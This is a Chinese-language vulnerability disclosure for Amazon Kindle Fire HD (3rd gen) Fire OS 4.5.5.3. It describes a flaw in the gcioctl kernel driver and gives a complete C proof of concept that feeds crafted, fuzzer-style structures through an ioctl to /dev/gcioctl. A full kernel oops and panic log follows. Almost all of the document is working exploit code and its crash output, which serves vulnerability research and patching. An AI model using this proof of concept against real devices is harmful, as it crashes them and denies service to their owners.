一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3的内核组件中的内核模块/omap/drivers/misc/gcx/gcioctl/gcif.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ gcioctl使用命令1077435789并导致内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

#include<stdio.h>
#include<string.h>      //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h>      //write
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdbool.h>

// Socket boilerplate code taken from here: http://www.binarytides.com/server-client-example-c-sockets-linux/

/*
 seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blobs
*/
int debug = 1;

typedef struct {
    int src_id;
    int dst_id;
    int offset;
} map_entry_t;

short tiny_vals[18] = {128, 127, 64, 63, 32, 31, 16, 15, 8, 7, 4, 3, 2, 1, 0, 256, 255, -1};
int *small_vals;
int num_small_vals;

// populates small_vals when called
void populate_arrs(int top) {
    int num = 1;
    int count = 0;
    while (num < top) {
        //printf("%d\n", num);
        num <<= 1;
        count += 2;
    }
    // top
    count += 1;
    // -1
    count += 1;
    num_small_vals = count;
    num >>= 1;

    small_vals = malloc(sizeof(int)*count);
    memset(small_vals, 0, count);

    int i = 0;
    while(num > 1) {
        small_vals[i] = num;
        i++;
        small_vals[i] = num-1;
        i++;
        num >>= 1;
    }
    small_vals[i] = 0;
    small_vals[i+1] = top;
    small_vals[i+2] = top-1;
    small_vals[i+3] = -1;
}

// generate a random value of size size and store it in elem.
// value has a weight % chance to be a "small value"
void gen_rand_val(int size, char *elem,  int small_weight) {
    int i;

    if ((rand() % 100) < small_weight) {
        // do small thing
        unsigned int idx = (rand() % num_small_vals);
        printf("Choosing %d\n", small_vals[idx]);
        switch (size) {
            case 2:
                idx = (rand() % 18);
                *(short *)elem = tiny_vals[idx];
                break;
            case 4:
                *(int *)elem = small_vals[idx];
                break;

            case 8:
                *(long long*)elem = small_vals[idx];
                break;

            default:
                printf("Damn bro. Size: %d\n", size);
                exit(-1);
        }
    }

    else {

        for(i=0; i < size; i++) {
            elem[i] = (char)(rand()%0x100);
        }
    }

}

int main(int argc , char *argv[])
{
    int num_blobs = 0, num_mappings = 0, i = 0, dev_name_len = 0, j;
    unsigned int ioctl_id = 0;
    char *dev_name;
    void *tmp;
    char **ptr_arr;
    int *len_arr;
    unsigned int seed;

    int sockfd , client_sock , c , read_size;
    struct sockaddr_in server , client;
    int msg_size;
    void *generic_arr[264];

    // max val for small_vals array
    int top = 8192;
    int cnt = 0;
    // chance that our generics are filled with "small vals"
    int default_weight = 50;
    populate_arrs(top);
    int retest = 1;
    goto rerun;



    sockfd = socket(AF_INET , SOCK_STREAM , 0);
    if (sockfd == -1)
    {
        printf("Could not create socket");
    }
    puts("Socket created");

    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));

    server.sin_family = AF_INET;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(atoi(argv[1]));

    //Bind
    if( bind(sockfd,(struct sockaddr *)&server , sizeof(server)) < 0)
    {
        //print the error message
        perror("bind failed. Error");
        return 1;
    }
    puts("bind done");
listen:     
    // Listen
    listen(sockfd , 3);

    puts("Waiting for incoming connections...");
    c = sizeof(struct sockaddr_in);

    // accept connection from an incoming client
    client_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t*)&c);
    if (client_sock < 0)
    {
        perror("accept failed");
        return 1;
    }
    puts("Connection accepted");

    msg_size = 0;
    // Receive a message from client
    while( (read_size = recv(client_sock , &msg_size , 4 , 0)) > 0 )
    {
        // recv the entire message
        char *recv_buf = calloc(msg_size, sizeof(char));
        if (recv_buf == NULL) {
            printf("Failed to allocate recv_buf\n");
            exit(-1);
        }

        int nrecvd = recv(client_sock, recv_buf, msg_size, 0);
        if (nrecvd != msg_size) {
            printf("Error getting all data!\n");
            printf("nrecvd: %d\nmsg_size:%d\n", nrecvd, msg_size);
            exit(-1);
        }
        // quickly save a copy of the most recent data
        int savefd = open("/sdcard/saved", O_WRONLY|O_TRUNC|O_CREAT, 0644);
        if (savefd < 0) {
            perror("open saved");
            exit(-1);
        }

        int err = write(savefd, recv_buf, msg_size);
        if (err != msg_size) {
            perror("write saved");
            exit(-1);
        }
        fsync(savefd);
        close(savefd);
rerun:
        if (retest) {
            recv_buf = calloc(msg_size, sizeof(char));
            int fd = open("/sdcard/saved", O_RDONLY);
            if (fd < 0) {
                perror("open:");
                exit(-1);
            }
            int fsize = lseek(fd, 0, SEEK_END);
            printf("file size: %d\n", fsize);
            lseek(fd, 0, SEEK_SET);
            read(fd, recv_buf, fsize);
        }

        char *head = recv_buf;
        seed = 0;
        //seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
        memcpy(&seed, head, 4);
        head += 4;
        memcpy(&ioctl_id, head, 4);
        head += 4;
        memcpy(&num_mappings, head, 4);
        head += 4;
        memcpy(&num_blobs, head, 4);
        head += 4;
        memcpy(&dev_name_len, head, 4);
        head += 4;

        // srand with new seed
        srand(seed);

        /* dev name */
        dev_name = calloc(dev_name_len+1, sizeof(char));
        if (dev_name == NULL) {
            printf("Failed to allocate dev_name\n");
            exit(-1);
        }
        memcpy(dev_name, head, dev_name_len);
        head += dev_name_len;

        /* map */
        map_entry_t *map = calloc(num_mappings, sizeof(map_entry_t));
        if (map == NULL) {
            printf("Failed to allocate map\n");
            exit(-1);
        }

        if (num_mappings != 0) {
            memcpy(map, head, num_mappings*sizeof(map_entry_t));
            head += num_mappings*sizeof(map_entry_t);
        }

        /* blobs */

        // first create an array to store the sizes themselves
        len_arr = calloc(num_blobs, sizeof(int));
        if (len_arr == NULL) {
            printf("Failed to allocate len_arr\n");
            exit(-1);
        }

        // we'll also want an array to store our pointers
        ptr_arr = calloc(num_blobs, sizeof(void *));
        if (ptr_arr == NULL) {
            printf("Failed to allocate ptr_arr\n");
            exit(-1);
        }


        // copy the blob sizes into our size_arr
        for (j=0; j < num_blobs; j++) {
            memcpy(&len_arr[j], head, sizeof(int));
            head += sizeof(int);
        }

        // we'll also want memory bufs for all blobs
        // now that we have the sizes, allocate all the buffers we need
        for (j=0; j < num_blobs; j++) {
            ptr_arr[j] = calloc(len_arr[j], sizeof(char));
            printf("Sizeof(ptr_arr[%d])=%d\n", j, len_arr[j]);
            printf("ptr_arr[%d]=%p\n", j, ptr_arr[j]);

            //printf("just added %p to ptr_arr\n", ptr_arr[j]);
            if (ptr_arr[j] == NULL) {
                printf("Failed to allocate a blob store\n");
                exit(-1);
            }

            // might as well copy the memory over as soon as we allocate the space
            memcpy((char *)ptr_arr[j], head, len_arr[j]);
            printf("ptr_arr[%d]=\n", j);
            for(i=0;i<len_arr[j];i+=4){
                printf("0x%08x\n", *(unsigned int *)(ptr_arr[j] + i));
            }
            printf("\n");

            head += len_arr[j];
        }

        int num_generics = 0;

        // time for pointer fixup
        for (i=0; i < num_mappings; i++) {
            // get out entry
            map_entry_t entry = map[i];
            // pull out the struct to be fixed up
            char *tmp = ptr_arr[entry.src_id];

            // check if this is a struct ptr or just a generic one

            // just a generic one
            if (entry.dst_id < 0) {
                // 90% chance we fixup the generic
                if ( (rand() % 10) > 0) {
                    int buf_len = 128;
                    char *tmp_generic = malloc(buf_len);
                    memset(tmp_generic, 0, buf_len);
                    // 95% chance we fill it with data
                    if ((rand() % 100) > 95) {
                        // if dst_id is < 0, it's abs value is the element size
                        int size = -1 * entry.dst_id;
                        int weight;
                        // if it's a char or some float, never choose a "small val"
                        if (size == 1 || size > 8)
                            weight = 0;
                        else
                            weight = default_weight;

                        for (i=0; i < buf_len; i+=size) {
                            gen_rand_val(size, &tmp_generic[i], weight);
                        }
                    }
                    generic_arr[num_generics] = tmp_generic;
                    memcpy(tmp+entry.offset, &tmp_generic, sizeof(void *));
                    num_generics += 1;
                    if (num_generics >= 264) {
                        printf("Code a better solution for storing generics\n");
                        exit(1);
                    }
                }
            }

            // a struct ptr, so we have the data
            else {
                // 1 in 400 chance we don't fixup
                if ( (rand() % 400) > 0) {
                    // now point it to the correct struct/blob
                    // printf("placing %p, at %p\n", ptr_arr[entry.dst_id], tmp+entry.offset);
                    memcpy(tmp+entry.offset, &ptr_arr[entry.dst_id], sizeof(void *));
                }
            }
        }

        if (debug) {
            printf("ioctl_id: %d\n", ioctl_id);
            printf("num_mappings: %d\n", num_mappings);
            printf("num_blobs: %d\n", num_blobs);
            printf("dev_name_len: %d\n", dev_name_len);
            printf("dev_name: %s\n", dev_name);
            printf("data[]: \n");
            //printf("(0x%x)\n", *(int *)&ptr_arr[0]);
            printf("(0x%p) : ", &ptr_arr[0]);
            printf("(0x%016lx)\n", *(unsigned long int *)ptr_arr[0]);
            printf("(0x%p) : ", (&ptr_arr[0]+1*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+1*8));

            printf("(0x%p) : ", (&ptr_arr[0]+2*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+2*8));

            printf("(0x%p) : ", (&ptr_arr[0]+3*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+3*8));

            printf("(0x%p) : ", (&ptr_arr[0]+4*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+4*8));

            //printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+5*8));
            //printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+6*8));

            //printf("(0x%x)\n", (int *)ptr_arr, (int *)ptr_arr);

        }

        // time for the actual ioctl
        //printf("Try to open device %s\n", dev_name);
        //fflush(stdout);
        int fd = open(dev_name, O_RDONLY);
        if (fd < 0) {
            perror("open");
            exit(-1);
        } else {
            printf("Open devicd %s successfully.\n", dev_name);
        }

        //fflush(stdout);
        //printf("Try to call ioctl(fd=%d, ioctl_id=%d, ptr_arr=%p)\n", fd, ioctl_id, ptr_arr[0]);
        fflush(stdout);
        printf("%10d:", cnt++);
        if ((ioctl(fd, ioctl_id, ptr_arr[0])) == -1)
            perror("ioctl");

        else
            printf("good hit\n");
        close(fd);
        printf("device %s closed\n", dev_name);

        if (retest)
            exit(0);

        fflush(stdout);
        // okay now free all the shit we alloced
        free(recv_buf);
        free(dev_name);
        if (map != NULL)
            free(map);
        free(len_arr);
        for (i=0; i < num_blobs; i++) {
            //printf("%d: free'ing %p\n", i, ptr_arr[i]);
            free(ptr_arr[i]);
        }
        free(ptr_arr);
        for (i=0; i < num_generics; i++) {
            free(generic_arr[i]);
        }

        write(client_sock, &msg_size, 4);

        msg_size = 0;
    }

    if(read_size == 0)
    {
        puts("Client disconnected");
        fflush(stdout);
        close(client_sock);
        goto listen;
    }
    else if(read_size == -1)
    {
        perror("recv failed");
    }

    return 0;
}

崩溃日志

[  144.428375] Unable to handle kernel paging request at virtual address d900000c
[  144.436462] pgd = dcac0000
[  144.439697] [d900000c] *pgd=00000000
[  144.443939] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[  144.450012] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[  144.457672] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[  144.465118] PC is at c2dm_l1cache+0x30/0x100
[  144.469940] LR is at dev_ioctl+0x3f0/0x10c4
[  144.474670] pc : [<c03187ac>]    lr : [<c031782c>]    psr: a0000013
[  144.474670] sp : c2d6be38  ip : 00000000  fp : c2d6be6c
[  144.487640] r10: 00000000  r9 : d8c0cca8  r8 : 00b8dd90
[  144.493621] r7 : 00000000  r6 : c2d6bea4  r5 : 00b8dd90  r4 : 388b77c4
[  144.500915] r3 : d9000004  r2 : 75e0c121  r1 : c2d6bea4  r0 : 00000000
[  144.508331] Flags: NzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  144.516418] Control: 10c5387d  Table: 9cac004a  DAC: 00000015
[  144.522827] 
[  144.522857] PC: 0xc031872c:
[  144.527954] 872c  e51b2034 e592300c eaffffa5 e30c281c e34c209d e5923000 e3530000 1affffbd
[  144.538482] 874c  eaffffc0 e51b303c e51b1040 e2833001 e51b2034 e1530001 e50b303c e2822010
[  144.549163] 876c  e50b2034 1affff8c eaffff83 c09dc81c e1a0c00d e92ddff0 e24cb004 e24dd00c
[  144.559844] 878c  e3500000 e1a07002 e50b0030 da00000d e0814200 e1a06001 e1a03001 e3a02000
[  144.570404] 87ac  e5930008 e593c004 e2833010 e1530004 e022209c 1afffff9 e3520902 3a000003
[  144.581085] 87cc  e3570002 9a000022 e24bd028 e89daff0 e59f9090 e2818008 e3a0a000 e5963008
[  144.591735] 87ec  e5184008 e3530000 13a05000 1a00000a ea000010 e5181004 e5993024 e0841001
[  144.602416] 880c  e12fff33 e5962008 e2855001 e596300c e1550002 e0844003 2a000006 e2572000
[  144.612976] 
[  144.612976] LR: 0xc03177ac:
[  144.618072] 77ac  ebf55c15 eaffff35 e3053d8d e3443038 e1510003 1affff30 e1a0200d e3c23d7f
[  144.628631] 77cc  e3c3303f e24b0064 e5933008 e2952038 30d22003 33a03000 e3530000 1a0001a8
[  144.639160] 77ec  e1a01005 e3a02038 ebfcfa90 e3500000 1a00000e e51b2030 e3520001 0a0001cb
[  144.649780] 780c  e3520002 0a0001ee e3520000 1a000007 e51b0064 e3a02000 e24b1060 eb0003d3
[  144.660369] 782c  e51b0064 e24b1060 e51b2030 eb000338 e3a05000 eaffff11 e24b1064 e50b1088
[  144.670776] 784c  e51b0088 e3a01010 ebfd03c1 e3a03004 e50b3064 e5963008 e2952004 30d22003
[  144.681213] 786c  33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f e3c6603f
[  144.691528] 788c  e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064 e1a01005
[  144.701995] 
[  144.701995] SP: 0xc2d6bdb8:
[  144.706878] bdb8  c2d6be24 00b8dd90 c2d6bdec c2d6bdd0 c00084d0 c03187ac a0000013 ffffffff
[  144.717407] bdd8  c2d6be24 00b8dd90 c2d6be6c c2d6bdf0 c06a5318 c0008370 00000000 c2d6bea4
[  144.727905] bdf8  75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4 00000000 00b8dd90 d8c0cca8
[  144.738586] be18  00000000 c2d6be6c 00000000 c2d6be38 c031782c c03187ac a0000013 ffffffff
[  144.749145] be38  c02ba53c 575b4b92 d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90
[  144.759796] be58  d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088
[  144.770355] be78  000ffeff 00000001 c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000
[  144.781005] be98  c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261
[  144.791687] 
[  144.791687] FP: 0xc2d6bdec:
[  144.796661] bdec  c0008370 00000000 c2d6bea4 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4
[  144.807189] be0c  00000000 00b8dd90 d8c0cca8 00000000 c2d6be6c 00000000 c2d6be38 c031782c
[  144.817840] be2c  c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000 00000000 00b8dd90
[  144.828399] be4c  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c
[  144.839080] be6c  c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc c2d6be90 c0207454
[  144.849761] be8c  c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f
[  144.860290] beac  83b275c7 00000000 00020261 00000000 00000000 00000000 00000000 00000000
[  144.870971] becc  00000000 00000000 00000000 c02089fc 00000000 dcae46c0 0000000b dcae46c0
[  144.881652] 
[  144.881652] R1: 0xc2d6be24:
[  144.886627] be24  c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[  144.897308] be44  00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[  144.907989] be64  c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[  144.918518] be84  c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[  144.929199] bea4  4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[  144.939849] bec4  00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[  144.950531] bee4  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[  144.961059] bf04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[  144.971710] 
[  144.971710] R3: 0xd8ffff84:
[  144.976623] ff84  d8ffff20 d8efb000 00000707 020e40fb d8efb075 d8ffff3c d8efb01c d8ffffa0
[  144.987213] ffa4  d8ffffa0 d8efb028 ca9788f0 d8ffffb0 d8ffffb0 00000000 bf06e9c8 80000088
[  144.997772] ffc4  dd2eac00 dd309540 00000000 00000000 00000000 00000000 00000000 00000000
[  145.008392] ffe4  00000000 00000000 00000000 00000000 00000000 00000000 00000000 ********
[  145.018798] 0004  ******** ******** ******** ******** ******** ******** ******** ********
[  145.029327] 0024  ******** ******** ******** ******** ******** ******** ******** ********
[  145.039886] 0044  ******** ******** ******** ******** ******** ******** ******** ********
[  145.050384] 0064  ******** ******** ******** ******** ******** ******** ******** ********
[  145.060913] 
[  145.060913] R6: 0xc2d6be24:
[  145.066009] be24  c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[  145.076568] be44  00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[  145.087219] be64  c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[  145.097900] be84  c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[  145.108459] bea4  4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[  145.118988] bec4  00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[  145.129638] bee4  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[  145.140319] bf04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[  145.150848] 
[  145.150848] R9: 0xd8c0cc28:
[  145.155944] cc28  d8c0cc28 d8c0cc28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[  145.166503] cc48  00000000 00000000 d8c0cc50 d8c0cc50 00000000 c0aa5174 c0aa5174 c0aa5148
[  145.177062] cc68  5aefd94b 00000000 00000000 00000000 d8c0cc80 9ad1f453 00000000 00000000
[  145.187713] cc88  00200000 00000000 00000000 d8c0cc94 d8c0cc94 dd3b56c0 dd3b56c0 00000000
[  145.198394] cca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[  145.208923] ccc8  d8c0cd80 dd3e3e70 00001064 00000001 0fb00000 5aefd94b 2d2b4d13 5aefd94b
[  145.219573] cce8  2d2b4d13 5aefd94b 2d2b4d13 00000000 00000000 00000000 00000000 00000000
[  145.230255] cd08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0cd24
[  145.240936] Process executor32 (pid: 3810, stack limit = 0xc2d6a2f8)
[  145.248016] Stack: (0xc2d6be38 to 0xc2d6c000)
[  145.253082] be20:                                                       c02ba53c 575b4b92
[  145.262176] be40: d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000
[  145.271392] be60: c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001
[  145.280609] be80: c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8
[  145.289703] bea0: 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000
[  145.298919] bec0: 00000000 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000
[  145.308105] bee0: dcae46c0 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08
[  145.317352] bf00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[  145.326416] bf20: dcf8c440 c2d6bf0c c2d6a000 00b8dd80 00b8dd90 40385d8d dcae46c0 0000000b
[  145.335662] bf40: c2d6a000 00000000 c2d6bf64 00000000 00b8dd90 40385d8d dcae46c0 0000000b
[  145.344879] bf60: c2d6a000 00000000 c2d6bfa4 c2d6bf78 c01365e0 c0135fc4 00000000 00000000
[  145.354095] bf80: c0013e08 00b8dd80 000121c0 00000000 00000036 c0013e08 00000000 c2d6bfa8
[  145.363159] bfa0: c0013c60 c0136578 00b8dd80 000121c0 0000000b 40385d8d 00b8dd90 00b8dd90
[  145.372406] bfc0: 00b8dd80 000121c0 00000000 00000036 00000000 00000000 00000000 bee035f4
[  145.381622] bfe0: 810100fc bee030f4 00011578 0002b28c 60000010 0000000b 4d6969d9 03020430
[  145.390686] Backtrace: 
[  145.393829] [<c031877c>] (c2dm_l1cache+0x0/0x100) from [<c031782c>] (dev_ioctl+0x3f0/0x10c4)
[  145.403228] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[  145.412658] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[  145.421874] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[  145.431304]  r8:c0013e08 r7:00000036 r6:00000000 r5:000121c0 r4:00b8dd80
[  145.439605] Code: e0814200 e1a06001 e1a03001 e3a02000 (e5930008) 
[  145.450225] Board Information: 
[  145.450225]  Revision : 0001
[  145.450256]  Serial    : 0000000000000000
[  145.450256] SoC Information:
[  145.450256]  CPU    : OMAP4470
[  145.450286]  Rev    : ES1.0
[  145.450286]  Type    : HS
[  145.450286]  Production ID: 0002B975-000000CC
[  145.450286]  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
[  145.450317] 
[  145.485900] ---[ end trace 0fe3b4c74b4e9fa7 ]---
[  145.491149] Kernel panic - not syncing: Fatal exception
[  145.496917] CPU1: stopping
[  145.500152] Backtrace: 
[  145.503204] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[  145.512695]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[  145.519714] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[  145.528961] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[  145.538482] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[  145.547637] Exception stack(0xd85a5fb0 to 0xd85a5ff8)
[  145.553466] 5fa0:                                     41822290 418185e8 00000001 41c95000
[  145.562561] 5fc0: 418185e8 41687460 4010d0ec 418185e8 4010d038 41689398 7fffffff 401602ec
[  145.571777] 5fe0: 418191e8 5ba34d10 41609aa8 41609974 200b0010 ffffffff
[  145.579284]  r6:ffffffff r5:200b0010 r4:41609974 r3:41822290
[  145.586364] CPU0 PC (0) : 0xc003ee38
[  145.590576] CPU0 PC (1) : 0xc003ee54
[  145.594635] CPU0 PC (2) : 0xc003ee54
[  145.598693] CPU0 PC (3) : 0xc003ee54
[  145.602722] CPU0 PC (4) : 0xc003ee54
[  145.606781] CPU0 PC (5) : 0xc003ee54
[  145.610839] CPU0 PC (6) : 0xc003ee54
[  145.614898] CPU0 PC (7) : 0xc003ee54
[  145.619110] CPU0 PC (8) : 0xc003ee54
[  145.623168] CPU0 PC (9) : 0xc003ee54
[  145.627227] CPU1 PC (0) : 0xc0019b2c
[  145.631408] CPU1 PC (1) : 0xc0019b2c
[  145.635467] CPU1 PC (2) : 0xc0019b2c
[  145.639495] CPU1 PC (3) : 0xc0019b2c
[  145.643707] CPU1 PC (4) : 0xc0019b2c
[  145.647766] CPU1 PC (5) : 0xc0019b2c
[  145.651824] CPU1 PC (6) : 0xc0019b2c
[  145.656005] CPU1 PC (7) : 0xc0019b2c
[  145.660064] CPU1 PC (8) : 0xc0019b2c
[  145.664123] CPU1 PC (9) : 0xc0019b2c
[  145.668182] 
[  145.669952] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[  145.669982]